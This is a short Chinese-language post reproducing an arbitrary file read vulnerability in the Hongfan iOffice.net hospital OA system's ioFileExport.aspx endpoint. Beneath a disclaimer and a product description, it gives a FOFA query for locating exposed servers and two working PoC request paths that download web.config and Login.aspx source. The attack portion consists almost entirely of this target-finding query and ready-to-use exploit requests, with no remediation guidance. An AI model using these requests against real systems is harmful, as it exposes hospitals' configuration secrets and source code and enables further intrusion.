漏洞复现 红帆OA ioFileExport.aspx 任意文件读取漏洞

0x01 阅读须知

技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！！

0x02 漏洞描述

历经十几年的发展，红帆iOffice.net从最早满足医院行政办公需求（传统OA），到目前融合了卫生主管部门的管理规范和众多行业特色应用，是目前唯一定位于解决医院综合业务管理的软件，是最符合医院行业特点的医院综合业务管理平台，是成功案例最多的医院综合业务管理软件。红帆iOffice.net ioFileExport.aspx处存在任意文件读取，攻击者可以从其中获取网站路径和源码等敏感信息进一步攻击。

0x03 漏洞复现

fofa：app="红帆-ioffice"

1.执行POC得到配置文件、源码等信息

/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename=test.txt&ContentType=application/octet-stream
/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/Login.aspx&filename=test.txt&ContentType=application/octet-stream

来源:https://mp.weixin.qq.com/s/8bv0EEZbmr9b39k_v_Qv_w